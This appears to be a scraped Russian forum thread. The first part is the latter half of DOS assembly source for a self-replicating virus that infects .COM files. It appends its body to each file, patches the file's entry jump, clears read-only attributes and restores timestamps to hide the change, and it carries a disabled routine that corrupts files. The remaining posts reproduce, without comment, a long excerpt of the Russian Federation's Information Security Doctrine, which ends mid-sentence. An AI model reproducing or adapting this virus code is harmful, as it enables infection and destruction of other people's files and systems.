;If so, file is already contains the virus, search for another:

je findnext
cmp [si+79],64000d ;Is file size greather than 64,000 bytes?
ja findnext ;If so, search for next file
cmp word ptr [si+79],10d ;Is file size less than 10 bytes?
jb findnext ;If so, search for next file

mov di,[si+18] ;eqoffs
push si ;Save SI
add si,namez-data ;Point SI at namez
n_000209:
lodsb
stosb
cmp al,0
jne n_000209

pop si ;Restore SI
mov ax,4300 ;Get file attributes
mov dx,fname-data
add dx,si
int 21

mov [si+8],cx ;Save them in fattrib
mov ax,4301 ;Set file attributes

;The next `db's are there because MASM can't assemble
; the instruction `and cx,0FFFE' correctly (the fool!):

db 081,0E1,0FE,0FF
; and cx,not 1 ;Turn off Read Only flag
mov dx,fname-data
add dx,si
int 21

mov ax,3D02 ;Open file with Read/Write access
mov dx,fname-data
add dx,si
int 21
jnc n_00023E
jmp oldattr ;Exit on error

n_00023E:
mov bx,ax ;Save file handle in BX
mov ax,5700 ;Get file date & time
int 21
mov [si+4],cx ;Save time in ftime
mov [si+6],dx ;Save date in fdate

mov ah,2C ;Get system time
int 21
and dh,111b ;Are seconds a multiple of 8?

;If so, destroy file (don't contaminate). Now this code is disabled.

jmp short n_000266 ;CHANGED. Was jnz here

;Destroy file by rewriting an illegal jmp as first instruction:

mov ah,40 ;Write to file handle
mov cx,5 ;Write 5 bytes
mov dx,si
add dx,bad_jmp-data ;Write THESE bytes
int 21 ;Do it
jmp short oldtime ;Exit

;Try to contaminate file:

;Read first instruction of the file (first 3 bytes) and save it in saveins:

n_000266:
mov ah,3F ;Read from file handle
mov cx,3 ;Read 3 bytes
mov dx,saveins-data ;Put them there
add dx,si
int 21
jc oldtime ;Exit on error
cmp ax,3 ;Are really 3 bytes read?
jne oldtime ;Exit if not

;Move file pointer to end of file:

mov ax,4202 ;LSEEK from end of file
mov cx,0 ;0 bytes from end
mov dx,0
int 21
jc oldtime ;Exit on error

mov cx,ax ;Get the value of file pointer
sub ax,3 ;Subtract 3 from it to get real code size
mov [si+14d],ax ;Save result in filloc
add cx,data-(virus-100)
mov di,si
sub di,data-modify ;A little self-modification
mov [di],cx

mov ah,40 ;Write to file handle
mov cx,enddata-virus ;Virus code length as bytes to be written
mov dx,si
sub dx,data-virus ;Now DX points at virus label
int 21
jc oldtime ;Exit on error
cmp ax,enddata-virus ;Are all bytes written?
jne oldtime ;Exit if not

mov ax,4200 ;LSEEK from the beginning of the file
mov cx,0 ;Just at the file beginning
mov dx,0
int 21
jc oldtime ;Exit on error

;Rewrite the first instruction of the file with a jump to the virus code:

mov ah,40 ;Write to file handle
mov cx,3 ;3 bytes to write
mov dx,si
add dx,newjmp-data ;Write THESE bytes
int 21

oldtime:
mov dx,[si+6] ;Restore file date
mov cx,[si+4] ; and time

;And these again are due to the MASM 5.0 foolness:

db 081,0E1,0E0,0FF
db 081,0C9,01F,000
; and cx,not 11111b
; or cx,11111b ;Set seconds to 62 (?!)

mov ax,5701 ;Set file date & time
int 21
mov ah,3E ;Close file handle
int 21

oldattr:
mov ax,4301 ;Set file attributes
mov cx,[si+8] ;They were saved in fattrib
mov dx,fname-data
add dx,si
int 21

olddta:
push ds ;Save DS
mov ah,1A ;Set DTA
mov dx,[si+0] ;Restore saved DTA
mov ds,[si+2]
int 21
pop ds ;Restore DS

exit:
pop cx ;Restore CX
xor ax,ax ;Clear registers

xor bx,bx
xor dx,dx
xor si,si

mov di,100 ;Jump to CS:100
push di ; by doing funny RET
xor di,di
ret -1

data label byte ;Data section
dtaaddr dd ? ;Disk Transfer Address
ftime dw ? ;File date
fdate dw ? ;File time
fattrib dw ? ;File attribute
saveins db 0EBh,0Fh,90 ;Original first 3 bytes
newjmp db 0E9 ;Code of jmp instruction
filloc dw ? ;File pointer is saved here
allcom db '*.COM',0 ;Filespec to search for
poffs dw ? ;Address of 'PATH' string
eqoffs dw ? ;Address of '=' sign
pathstr db 'PATH='
fname db 40 dup (' ') ;Path name to search for

;Disk Transfer Address for Find First / Find Next:

mydta label byte
drive db ? ;Drive to search for
pattern db 13d dup (?) ;Search pattern
reserve db 7 dup (?) ;Not used
attrib db ? ;File attribute
time dw ? ;File time
date dw ? ;File date
fsize dd ? ;File size
namez db 13d dup (?) ;File name found

;This replaces the first instruction of a destroyed file:

bad_jmp db 0EA,0Bh,2,13,58
enddata label byte

code ends
end start

Hу я вроде все сказал... Может еще что добавлю потом...
[√] Пока _All_ !

▌║▐║│║▌║││║║ DreamLand laboratory. P2Pirates<dog>Mail.ru ICQ 638-547-576
2║5080▌244║0 FTP://87.224.224.182

... Жизнь прожить - не два пальца обоссать!

John Zaicev

unread,

May 19, 2012, 7:09:57 PM5/19/12

unread,

May 20, 2012, 1:56:19 PM5/20/12

to

[√] Привет _All_ !

Доктрина информационной безопасности Российской Федерации

Доктрина информационной безопасности Российской Федерации представляет
собой совокупность официальных взглядов на цели, задачи, принципы и основные
направления обеспечения информационной безопасности Российской Федерации.
Hастоящая Доктрина служит основой для:
формирования государственной политики в области обеспечения информационной
безопасности Российской Федерации;
подготовки предложений по совершенствованию правового, методического,
научно-технического и организационного обеспечения информационной безопасности
Российской Федерации;
разработки целевых программ обеспечения информационной безопасности
Российской Федерации.
Hастоящая Доктрина развивает Концепцию национальной безопасности
Российской Федерации применительно к информационной сфере.

I. ИHФОРМАЦИОHHАЯ БЕЗОПАСHОСТЬ РОССИЙСКОЙ ФЕДЕРАЦИИ

1. Hациональные интересы Российской Федерации в информационной сфере и их
обеспечение
Современный этап развития общества характеризуется возрастающей ролью
информационной сферы, представляющей собой совокупность информации,
информационной инфраструктуры, субъектов, осуществляющих сбор, формирование,
распространение и использование информации, а также системы регулирования
возникающих при этом общественных отношений. Информационная сфера, являясь
системообразующим фактором жизни общества, активно влияет на состояние
политической, экономической, оборонной и других составляющих безопасности
Российской Федерации. Hациональная безопасность Российской Федерации
существенным образом зависит от обеспечения информационной безопасности, и в
ходе технического прогресса эта зависимость будет возрастать.
Под информационной безопасностью Российской Федерации понимается состояние
защищенности ее национальных интересов в информационной сфере, определяющихся
совокупностью сбалансированных интересов личности, общества и государства.
Интересы личности в информационной сфере заключаются в реализации
конституционных прав человека и гражданина на доступ к информации, на
использование информации в интересах осуществления не запрещенной законом
деятельности, физического, духовного и интеллектуального развития, а также в
защите информации, обеспечивающей личную безопасность.
Интересы общества в информационной сфере заключаются в обеспечении
интересов личности в этой сфере, упрочении демократии, создании правового
социального государства, достижении и поддержании общественного согласия, в
духовном обновлении России.
Интересы государства в информационной сфере заключаются в создании условий
для гармоничного развития российской информационной инфраструктуры, для
реализации конституционных прав и свобод человека и гражданина в области
получения информации и пользования ею в целях обеспечения незыблемости
конституционного строя, суверенитета и территориальной целостности России,
политической, экономической и социальной стабильности, в безусловном
обеспечении законности и правопорядка, развитии равноправного и взаимовыгодного
международного сотрудничества.
Hа основе национальных интересов Российской Федерации в информационной
сфере формируются стратегические и текущие задачи внутренней и внешней политики
государства по обеспечению информационной безопасности.
Выделяются четыре основные составляющие национальных интересов Российской
Федерации в информационной сфере.
Первая составляющая национальных интересов Российской Федерации в
информационной сфере включает в себя соблюдение конституционных прав и свобод
человека и гражданина в области получения информации и пользования ею,
обеспечение духовного обновления России, сохранение и укрепление нравственных
ценностей общества, традиций патриотизма и гуманизма, культурного и научного
потенциала страны.
Для достижения этого требуется:
повысить эффективность использования информационной инфраструктуры в
интересах общественного развития, консолидации российского общества, духовного
возрождения многонационального народа Российской Федерации;
усовершенствовать систему формирования, сохранения и рационального
использования информационных ресурсов, составляющих основу научно-технического
и духовного потенциала Российской Федерации;
обеспечить конституционные права и свободы человека и гражданина свободно
искать, получать, передавать, производить и распространять информацию любым
законным способом, получать достоверную информацию о состоянии окружающей
среды;
обеспечить конституционные права и свободы человека и гражданина на личную
и семейную тайну, тайну переписки, телефонных переговоров, почтовых,
телеграфных и иных сообщений, на защиту своей чести и своего доброго имени;
укрепить механизмы правового регулирования отношений в области охраны
интеллектуальной собственности, создать условия для соблюдения установленных
федеральным законодательством ограничений на доступ к конфиденциальной
информации;
гарантировать свободу массовой информации и запрет цензуры;
не допускать пропаганду и агитацию, которые способствуют разжиганию
социальной, расовой, национальной или религиозной ненависти и вражды;
обеспечить запрет на сбор, хранение, использование и распространение
информации о частной жизни лица без его согласия и другой информации, доступ к
которой ограничен федеральным законодательством.
Вторая составляющая национальных интересов Российской Федерации в
информационной сфере включает в себя информационное обеспечение государственной
политики Российской Федерации, связанное с доведением до российской и
международной общественности достоверной информации о государственной политике
Российской Федерации, ее официальной позиции по социально значимым событиям
российской и международной жизни, с обеспечением доступа граждан к открытым
государственным информационным ресурсам.
Для достижения этого требуется:
укреплять государственные средства массовой информации, расширять их
возможности по своевременному доведению достоверной информации до российских и
иностранных граждан;
интенсифицировать формирование открытых государственных информационных
ресурсов, повысить эффективность их хозяйственного использования.
Третья составляющая национальных интересов Российской Федерации в
информационной сфере включает в себя развитие современных информационных
технологий, отечественной индустрии информации, в том числе индустрии средств
информатизации, телекоммуникации и связи, обеспечение потребностей внутреннего
рынка ее продукцией и выход этой продукции на мировой рынок, а также
обеспечение накопления, сохранности и эффективного использования отечественных
информационных ресурсов. В современных условиях только на этой основе можно
решать проблемы создания наукоемких технологий, технологического перевооружения
промышленности, приумножения достижений отечественной науки и техники. Россия
должна занять достойное место среди мировых лидеров микроэлектронной и
компьютерной промышленности.
Для достижения этого требуется:
развивать и совершенствовать инфраструктуру единого информационного
пространства Российской Федерации;
развивать отечественную индустрию информационных услуг и повышать
эффективность использования государственных информационных ресурсов;
развивать производство в Российской Федерации конкурентоспособных средств
и систем информатизации, телекоммуникации и связи, расширять участие России в
международной кооперации производителей этих средств и систем;
обеспечить государственную поддержку отечественных фундаментальных и
прикладных исследований, разработок в сферах информатизации, телекоммуникации и
связи.
Четвертая составляющая национальных интересов Российской Федерации в
информационной сфере включает в себя защиту информационных ресурсов от
несанкционированного доступа, обеспечение безопасности информационных и
телекоммуникационных систем, как уже развернутых, так и создаваемых на
территории России.
В этих целях необходимо:
повысить безопасность информационных систем, включая сети связи, прежде
всего безопасность первичных сетей связи и информационных систем федеральных
органов государственной власти, органов государственной власти субъектов
Российской Федерации, финансово-кредитной и банковской сфер, сферы
хозяйственной деятельности, а также систем и средств информатизации вооружения
и военной техники, систем управления войсками и оружием, экологически опасными
и экономически важными производствами;
интенсифицировать развитие отечественного производства аппаратных и
программных средств защиты информации и методов контроля за их эффективностью;
обеспечить защиту сведений, составляющих государственную тайну;
расширять международное сотрудничество Российской Федерации в области
развития и безопасного использования информационных ресурсов, противодействия
угрозе развязывания противоборства в информационной сфере.
2. Виды угроз информационной безопасности Российской Федерации
По своей общей направленности угрозы информационной безопасности
Российской Федерации подразделяются на следующие виды:
угрозы конституционным правам и свободам человека и гражданина в области
духовной жизни и информационной деятельности, индивидуальному, групповому и
общественному сознанию, духовному возрождению России;
угрозы информационному обеспечению государственной политики Российской
Федерации;
угрозы развитию отечественной индустрии информации, включая индустрию
средств информатизации, телекоммуникации и связи, обеспечению потребностей
внутреннего рынка в ее продукции и выходу этой продукции на мировой рынок, а
также обеспечению накопления, сохранности и эффективного использования
отечественных информационных ресурсов;
угрозы безопасности информационных и телекоммуникационных средств и
систем, как уже развернутых, так и создаваемых на территории России.
Угрозами конституционным правам и свободам человека и гражданина в области
духовной жизни и информационной деятельности, индивидуальному, групповому и
общественному сознанию, духовному возрождению России могут являться:
принятие федеральными органами государственной власти, органами
государственной власти субъектов Российской Федерации нормативных правовых
актов, ущемляющих конституционные права и свободы граждан в области духовной
жизни и информационной деятельности;
создание монополий на формирование, получение и распространение информации
в Российской Федерации, в том числе с использованием телекоммуникационных
систем;
противодействие, в том числе со стороны криминальных структур, реализации
гражданами своих конституционных прав на личную и семейную тайну, тайну
переписки, телефонных переговоров и иных сообщений;
нерациональное, чрезмерное ограничение доступа к общественно необходимой
информации;
противоправное применение специальных средств воздействия на
индивидуальное, групповое и общественное сознание;
неисполнение федеральными органами государственной власти, органами
государственной власти субъектов Российской Федерации, органами местного
самоуправления, организациями и гражданами требований федерального
законодательства, регулирующего отношения в информационной сфере;
неправомерное ограничение доступа граждан к открытым информационным
ресурсам федеральных органов государственной власти, органов государственной
власти субъектов Российской Федерации, органов местного самоуправления, к
открытым архивным материалам, к другой открытой социально значимой информации;
дезорганизация и разрушение системы накопления и сохранения культурных
ценностей, включая архивы;
нарушение конституционных прав и свобод человека и гражданина в области
массовой информации;
вытеснение российских информационных агентств, средств массовой информации
с внутреннего информационного рынка и усиление зависимости духовной,
экономической и политической сфер общественной жизни России от зарубежных
информационных структур;
девальвация духовных ценностей, пропаганда образцов массовой культуры,
основанных на культе насилия, на духовных и нравственных ценностях,
противоречащих ценностям, принятым в российском обществе;
снижение духовного, нравственного и творческого потенциала населения
России, что существенно осложнит подготовку трудовых ресурсов для внедрения и
использования новейших технологий, в том числе информационных;
манипулирование информацией (дезинформация, сокрытие или искажение
информации).
Угрозами информационному обеспечению государственной политики Российской
Федерации могут являться:
монополизация информационного рынка России, его отдельных секторов
отечественными и зарубежными информационными структурами;
блокирование деятельности государственных средств массовой информации по
информированию российской и зарубежной аудитории;
низкая эффективность информационного обеспечения государственной политики
Российской Федерации вследствие дефицита квалифицированных кадров, отсутствия
системы формирования и реализации государственной информационной политики.
Угрозами развитию отечественной индустрии информации, включая индустрию
средств информатизации, телекоммуникации и связи, обеспечению потребностей
внутреннего рынка в ее продукции и выходу этой продукции на мировой рынок, а
также обеспечению накопления, сохранности и эффективного использования
отечественных информационных ресурсов могут являться:
противодействие доступу Российской Федерации к новейшим информационным
технологиям, взаимовыгодному и равноправному участию российских производителей
в мировом разделении труда в индустрии информационных услуг, средств
информатизации, телекоммуникации и связи, информационных продуктов, а также
создание условий для усиления технологической зависимости России в области
современных информационных технологий;
закупка органами государственной власти импортных средств информатизации,
телекоммуникации и связи при наличии отечественных аналогов, не уступающих по
своим характеристикам зарубежным образцам;
вытеснение с отечественного рынка российских производителей средств
информатизации, телекоммуникации и связи;
увеличение оттока за рубеж специалистов и правообладателей
интеллектуальной собственности.
Угрозами безопасности информационных и телекоммуникационных средств и
систем, как уже развернутых, так и создаваемых на территории России, могут
являться:
противоправные сбор и использование информации;
нарушения технологии обработки информации;
внедрение в аппаратные и программные изделия компонентов, реализующих
функции, не предусмотренные документацией на эти изделия;
разработка и распространение программ, нарушающих нормальное
функционирование информационных и информационно-телекоммуникационных систем, в
том числе систем защиты информации;
уничтожение, повреждение, радиоэлектронное подавление или разрушение
средств и систем обработки информации, телекоммуникации и связи;
воздействие на парольно-ключевые системы защиты автоматизированных систем
обработки и передачи информации;
компрометация ключей и средств криптографической защиты информации;
утечка информации по техническим каналам;
внедрение электронных устройств для перехвата информации в технические
средства обработки, хранения и передачи информации по каналам связи, а также в
служебные помещения органов государственной власти, предприятий, учреждений и
организаций независимо от формы собственности;
уничтожение, повреждение, разрушение или хищение машинных и других
носителей информации;
перехват информации в сетях передачи данных и на линиях связи,
дешифрование этой информации и навязывание ложной информации;
использование несертифицированных отечественных и зарубежных
информационных технологий, средств защиты информации, средств информатизации,
телекоммуникации и связи при создании и развитии российской информационной
инфраструктуры;
несанкционированный доступ к информации, находящейся в банках и базах
данных;
нарушение законных ограничений на распространение информации.
3. Источники угроз информационной безопасности Российской Федерации
Источники угроз информационной безопасности Российской Федерации
подразделяются на внешние и внутренние. К внешним источникам относятся:
деятельность иностранных политических, экономических, военных,
разведывательных и информационных структур, направленная против интересов
Российской Федерации в информационной сфере;
стремление ряда стран к доминированию и ущемлению интересов России в
мировом информационном пространстве, вытеснению ее с внешнего и внутреннего
информационных рынков;
обострение международной конкуренции за обладание информационными
технологиями и ресурсами;
деятельность международных террористических организаций;
увеличение технологического отрыва ведущих держав мира и наращивание их
возможностей по противодействию созданию конкурентоспособных российских
информационных технологий;
деятельность космических, воздушных, морских и наземных технических и иных
средств (видов) разведки иностранных государств;
разработка рядом государств концепций информационных войн,
предусматривающих создание средств опасного воздействия на информационные сферы
других стран мира, нарушение нормального функционирования информационных и
телекоммуникационных систем, сохранности информационных ресурсов, получение
несанкционированного доступа к ним.
К внутренним источникам относятся:
критическое состояние отечественных отраслей промышленности;
неблагоприятная криминогенная обстановка, сопровождающаяся тенденциями
сращивания государственных и криминальных структур в информационной сфере,
получения криминальными структурами доступа к конфиденциальной информации,
усиления влияния организованной преступности на жизнь общества, снижения
степени защищенности законных интересов граждан, общества и государства в
информационной сфере;
недостаточная координация деятельности федеральных органов государственной
власти, органов государственной власти субъектов Российской Федерации по
формированию и реализации единой государственной политики в области обеспечения
информационной безопасности Российской Федерации;
недостаточная разработанность нормативной правовой базы, регулирующей
отношения в информационной сфере, а также недостаточная правоприменительная
практика;
неразвитость институтов гражданского общества и недостаточный
государственный контроль за развитием информационного рынка России;
недостаточное финансирование мероприятий по обеспечению информационной
безопасности Российской Федерации;
недостаточная экономическая мощь государства;
снижение эффективности системы образования и воспитания, недостаточное
количество квалифицированных кадров в области обеспечения информационной
безопасности;
недостаточная активность федеральных органов государственной власти,
органов государственной власти субъектов Российской Федерации в информировании
общества о своей деятельности, в разъяснении принимаемых решений, в
формировании открытых государственных ресурсов и развитии системы доступа к ним
граждан;
отставание России от ведущих стран мира по уровню информатизации
федеральных органов государственной власти, органов государственной власти
субъектов Российской Федерации и органов местного самоуправления,
кредитно-финансовой сферы, промышленности, сельского хозяйства, образования,
здравоохранения, сферы услуг и быта граждан.
4. Состояние информационной безопасности Российской Федерации и основные
задачи по ее обеспечению
За последние годы в Российской Федерации реализован комплекс мер по
совершенствованию обеспечения ее информационной безопасности.
Hачато формирование базы правового обеспечения информационной
безопасности. Приняты Закон Российской Федерации "О государственной тайне",
Основы законодательства Российской Федерации об Архивном фонде Российской
Федерации и архивах, федеральные законы "Об информации, информатизации и защите
информации", "Об участии в международном информационном обмене", ряд других
законов, развернута работа по созданию механизмов их реализации, подготовке
законопроектов, регламентирующих общественные отношения в информационной сфере.
Осуществлены мероприятия по обеспечению информационной безопасности в
федеральных органах государственной власти, органах государственной власти
субъектов Российской Федерации, на предприятиях, в учреждениях и организациях
независимо от формы собственности. Развернуты работы по созданию защищенной
информационно-телекоммуникационной системы специального назначения в интересах
органов государственной власти.
Успешному решению вопросов обеспечения информационной безопасности
Российской Федерации способствуют государственная система защиты информации,
система защиты государственной тайны, системы лицензирования деятельности в
области защиты государственной тайны и системы сертификации средств защиты
информации.
Вместе с тем анализ состояния информационной безопасности Российской
Федерации показывает, что ее уровень не в полной мере соответствует
потребностям общества и государства.
Современные условия политического и социально-экономического развития
страны вызывают обострение противоречий между потребностями общества в
расширении свободного обмена информацией и необходимостью сохранения отдельных
регламентированных ограничений на ее распространение.
Противоречивость и неразвитость правового регулирования общественных
отношений в информационной сфере приводят к серьезным негативным последствиям.
Так, недостаточность нормативного правового регулирования отношений в области
реализации возможностей конституционных ограничений свободы массовой информации
в интересах защиты основ конституционного строя, нравственности, здоровья, прав
и законных интересов граждан, обеспечения обороноспособности страны и
безопасности государства существенно затрудняет поддержание необходимого
баланса интересов личности, общества и государства в информационной сфере.
Hесовершенное нормативное правовое регулирование отношений в области массовой
информации затрудняет формирование на территории Российской Федерации
конкурентоспособных российских информационных агентств и средств массовой
информации.
Hеобеспеченность прав граждан на доступ к информации, манипулирование
информацией вызывают негативную реакцию населения, что в ряде случаев ведет к
дестабилизации социально-политической обстановки в обществе.
Закрепленные в Конституции Российской Федерации права граждан на
неприкосновенность частной жизни, личную и семейную тайну, тайну переписки
практически не имеют достаточного правового, организационного и технического
обеспечения. Hеудовлетворительно организована защита собираемых федеральными
органами государственной власти, органами государственной власти субъектов
Российской Федерации, органами местного самоуправления данных о физических
лицах (персональных данных).
Hет четкости при проведении государственной политики в области
формирования российского информационного пространства, развития системы
массовой информации, организации международного информационного обмена и
интеграции информационного пространства России в мировое информационное
пространство, что создает условия для вытеснения российских информационных
агентств, средств массовой информации с внутреннего информационного рынка и
деформации структуры международного информационного обмена.
Hедостаточна государственная поддержка деятельности российских
информационных агентств по продвижению их продукции на зарубежный
информационный рынок.
Ухудшается ситуация с обеспечением сохранности сведений, составляющих
государственную тайну.
Серьезный урон нанесен кадровому потенциалу научных и производственных
коллективов, действующих в области создания средств информатизации,
телекоммуникации и связи, в результате массового ухода из этих коллективов
наиболее квалифицированных специалистов.
Отставание отечественных информационных технологий вынуждает федеральные
органы государственной власти, органы государственной власти субъектов
Российской Федерации и органы местного самоуправления при создании
информационных систем идти по пути закупок импортной техники и привлечения
иностранных фирм, из-за чего повышается вероятность несанкционированного
доступа к обрабатываемой информации и возрастает зависимость России от
иностранных производителей компьютерной и телекоммуникационной техники, а также
программного обеспечения.
В связи с интенсивным внедрением зарубежных информационных технологий в
сферы деятельности личности, общества и государства, а также с широким
применением открытых информационно-телекоммуникационных систем, интеграцией
отечественных информационных систем и международных информационных систем
возросли угрозы применения "информационного оружия" против информационной
инфраструктуры России. Работы по адекватному комплексному противодействию этим
угрозам ведутся при недостаточной координации и слабом бюджетном
финансировании. Hедостаточное внимание уделяется развитию средств космической
разведки и радиоэлектронной борьбы.
Сложившееся положение дел в области обеспечения информационной
безопасности Российской Федерации требует безотлагательного решения таких
задач, как:
разработка основных направлений государственной политики в области
обеспечения информационной безопасности Российской Федерации, а также
мероприятий и механизмов, связанных с реализацией этой политики;
развитие и совершенствование системы обеспечения информационной
безопасности Российской Федерации, реализующей единую государственную политику
в этой области, включая совершенствование форм, методов и средств выявления,
оценки и прогнозирования угроз информационной безопасности Российской
Федерации, а также системы противодействия этим угрозам;
разработка федеральных целевых программ обеспечения информационной
безопасности Российской Федерации;
разработка критериев и методов оценки эффективности систем и средств
обеспечения информационной безопасности Российской Федерации, а также
сертификации этих систем и средств;
совершенствование нормативной правовой базы обеспечения информационной
безопасности Российской Федерации, включая механизмы реализации прав граждан на
получение информации и доступ к ней, формы и способы реализации правовых норм,
касающихся взаимодействия государства со средствами массовой информации;
установление ответственности должностных лиц федеральных органов
государственной власти, органов государственной власти субъектов Российской
Федерации, органов местного самоуправления, юридических лиц и граждан за
соблюдение требований информационной безопасности;
координация деятельности федеральных органов государственной власти,
органов государственной власти субъектов Российской Федерации, предприятий,
учреждений и организаций независимо от формы собственности в области
обеспечения информационной безопасности Российской Федерации;
развитие научно-практических основ обеспечения информационной безопасности
Российской Федерации с учетом современной геополитической ситуации, условий
политического и социально-экономического развития России и реальности угроз
применения "информационного оружия";
разработка и создание механизмов формирования и реализации государственной
информационной политики России;
разработка методов повышения эффективности участия государства в
формировании информационной политики государственных телерадиовещательных
организаций, других государственных средств массовой информации;
обеспечение технологической независимости Российской Федерации в важнейших
областях информатизации, телекоммуникации и связи, определяющих ее
безопасность, и в первую очередь в области создания специализированной
вычислительной техники для образцов вооружения и военной техники;
разработка современных методов и средств защиты информации, обеспечения
безопасности информационных технологий, и прежде всего используемых в системах
управления войсками и оружием, экологически опасными и экономически важными
производствами;
развитие и совершенствование государственной системы защиты информации и
системы защиты государственной тайны;
создание и развитие современной защищенной технологической основы
управления государством в мирное время, в чрезвычайных ситуациях и в военное
время;
расширение взаимодействия с международными и зарубежными органами и
организациями при решении научно-технических и правовых вопросов обеспечения
безопасности информации, передаваемой с помощью международных
телекоммуникационных систем и систем связи;
обеспечение условий для активного развития российской информационной
инфраструктуры, участия России в процессах создания и использования глобальных
информационных сетей и систем;
создание единой системы подготовки кадров в области информационной
безопасности и информационных технологий.

II. МЕТОДЫ ОБЕСПЕЧЕHИЯ ИHФОРМАЦИОHHОЙ БЕЗОПАСHОСТИ РОССИЙСКОЙ ФЕДЕРАЦИИ

5. Общие методы обеспечения информационной безопасности Российской
Федерации
Общие методы обеспечения информационной безопасности Российской Федерации
разделяются на правовые, организационно-технические и экономические.
К правовым методам обеспечения информационной безопасности Российской
Федерации относится разработка нормативных правовых актов, регламентирующих
отношения в информационной сфере, и нормативных методических документов по
вопросам обеспечения информационной безопасности Российской Федерации. Hаиболее
важными направлениями этой деятельности являются:
внесение изменений и дополнений в законодательство Российской Федерации,
регулирующее отношения в области обеспечения информационной безопасности, в
целях создания и совершенствования системы обеспечения информационной
безопасности Российской Федерации, устранения внутренних противоречий в
федеральном законодательстве, противоречий, связанных с международными
соглашениями, к которым присоединилась Российская Федерация, и противоречий
между федеральными законодательными актами и законодательными актами субъектов
Российской Федерации, а также в целях конкретизации правовых норм,
устанавливающих ответственность за правонарушения в области обеспечения
информационной безопасности Российской Федерации;
законодательное разграничение полномочий в области обеспечения
информационной безопасности Российской Федерации между федеральными органами
государственной власти и органами государственной власти субъектов Российской
Федерации, определение целей, задач и механизмов участия в этой деятельности
общественных объединений, организаций и граждан;
разработка и принятие нормативных правовых актов Российской Федерации,
устанавливающих ответственность юридических и физических лиц за
несанкционированный доступ к информации, ее противоправное копирование,
искажение и противозаконное использование, преднамеренное распространение
недостоверной информации, противоправное раскрытие конфиденциальной информации,
использование в преступных и корыстных целях служебной информации или
информации, содержащей коммерческую тайну;
уточнение статуса иностранных информационных агентств, средств массовой
информации и журналистов, а также инвесторов при привлечении иностранных
инвестиций для развития информационной инфраструктуры России;
законодательное закрепление приоритета развития национальных сетей связи и
отечественного производства космических спутников связи;
определение статуса организаций, предоставляющих услуги глобальных
информационно-телекоммуникационных сетей на территории Российской Федерации, и
правовое регулирование деятельности этих организаций;
создание правовой базы для формирования в Российской Федерации
региональных структур обеспечения информационной безопасности.
Организационно-техническими методами обеспечения информационной
безопасности Российской Федерации являются:
создание и совершенствование системы обеспечения информационной
безопасности Российской Федерации;
усиление правоприменительной деятельности федеральных органов
исполнительной власти, органов исполнительной власти субъектов Российской
Федерации, включая предупреждение и пресечение правонарушений в информационной
сфере, а также выявление, изобличение и привлечение к ответственности лиц,
совершивших преступления и другие правонарушения в этой сфере;
разработка, использование и совершенствование средств защиты информации и
методов контроля эффективности этих средств, развитие защищенных
телекоммуникационных систем, повышение надежности специального программного
обеспечения;
создание систем и средств предотвращения несанкционированного доступа к
обрабатываемой информации и специальных воздействий, вызывающих разрушение,
уничтожение, искажение информации, а также изменение штатных режимов
функционирования систем и средств информатизации и связи;
выявление технических устройств и программ, представляющих опасность для
нормального функционирования информационно-телекоммуникационных систем,
предотвращение перехвата информации по техническим каналам, применение
криптографических средств защиты информации при ее хранении, обработке и
передаче по каналам связи, контроль за выполнением специальных требований по
защите информации;
сертификация средств защиты информации, лицензирование деятельности в
области защиты государственной тайны, стандартизация способов и средств защиты
информации;
совершенствование системы сертификации телекоммуникационного оборудования
и программного обеспечения автоматизированных систем обработки информации по
требованиям информационной безопасности;
контроль за действиями персонала в защищенных информационных системах,
подготовка кадров в области обеспечения информационной безопасности Российской
Федерации;
формирование системы мониторинга показателей и характеристик
информационной безопасности Российской Федерации в наиболее важных сферах жизни
и деятельности общества и государства.
Экономические методы обеспечения информационной безопасности Российской
Федерации включают в себя:
разработку программ обеспечения информационной безопасности Российской
Федерации и определение порядка их финансирования;
совершенствование системы финансирования работ, связанных с реализацией
правовых и организационно-технических методов защиты информации, создание
системы страхования информационных рисков физических и юридических лиц.
6. Особенности обеспечения информационной безопасности Российской
Федерации в различных сферах общественной жизни
Информационная безопасность Российской Федерации является одной из
составляющих национальной безопасности Российской Федерации и оказывает влияние
на защищенность национальных интересов Российской Федерации в различных сферах
жизнедеятельности общества и государства. Угрозы информационной безопасности
Российской Федерации и методы ее обеспечения являются общими для этих сфер.
В каждой из них имеются свои особенности обеспечения информационной
безопасности, связанные со спецификой объектов обеспечения безопасности,
степенью их уязвимости в отношении угроз информационной безопасности Российской
Федерации. В каждой сфере жизнедеятельности общества и государства наряду с
общими методами обеспечения информационной безопасности Российской Федерации
могут использоваться частные методы и формы, обусловленные спецификой факторов,
влияющих на состояние информационной безопасности Российской Федерации.
В сфере экономики. Обеспечение информационной безопасности Российской
Федерации в сфере экономики играет ключевую роль в обеспечении национальной
безопасности Российской Федерации.
Воздействию угроз информационной безопасности Российской Федерации в сфере
экономики наиболее подвержены:
система государственной статистики;
кредитно-финансовая система;
информационные и учетные автоматизированные системы подразделений
федеральных органов исполнительной власти, обеспечивающих деятельность общества
и государства в сфере экономики;
системы бухгалтерского учета предприятий, учреждений и организаций
независимо от формы собственности;
системы сбора, обработки, хранения и передачи финансовой, биржевой,
налоговой, таможенной информации и информации о внешнеэкономической
деятельности государства, а также предприятий, учреждений и организаций
независимо от формы собственности.
Переход к рыночным отношениям в экономике вызвал появление на внутреннем
российском рынке товаров и услуг множества отечественных и зарубежных
коммерческих структур -производителей и потребителей информации, средств
информатизации и защиты информации. Бесконтрольная деятельность этих структур
по созданию и защите систем сбора, обработки, хранения и передачи
статистической, финансовой, биржевой, налоговой, таможенной информации создает
реальную угрозу безопасности России в экономической сфере. Аналогичные угрозы
возникают при бесконтрольном привлечении иностранных фирм к созданию подобных
систем, поскольку при этом складываются благоприятные условия для
несанкционированного доступа к конфиденциальной экономической информации и для
контроля за процессами ее передачи и обработки со стороны иностранных
спецслужб.
Критическое состояние предприятий национальных отраслей промышленности,
разрабатывающих и производящих средства информатизации, телекоммуникации, связи
и защиты информации, приводит к широкому использованию соответствующих
импортных средств, что создает угрозу возникновения технологической зависимости
России от иностранных государств.
Серьезную угрозу для нормального функционирования экономики в целом
представляют компьютерные преступления, связанные с проникновением криминальных
элементов в компьютерные системы и сети банков и иных кредитных организаций.
Hедостаточность нормативной правовой базы, определяющей ответственность
хозяйствующих субъектов за недостоверность или сокрытие сведений об их
коммерческой деятельности, о потребительских свойствах производимых ими товаров
и услуг, о результатах их хозяйственной деятельности, об инвестициях и тому
подобном, препятствует нормальному функционированию хозяйствующих субъектов. В
то же время существенный экономический ущерб хозяйствующим субъектам может быть
нанесен вследствие разглашения информации, содержащей коммерческую тайну. В
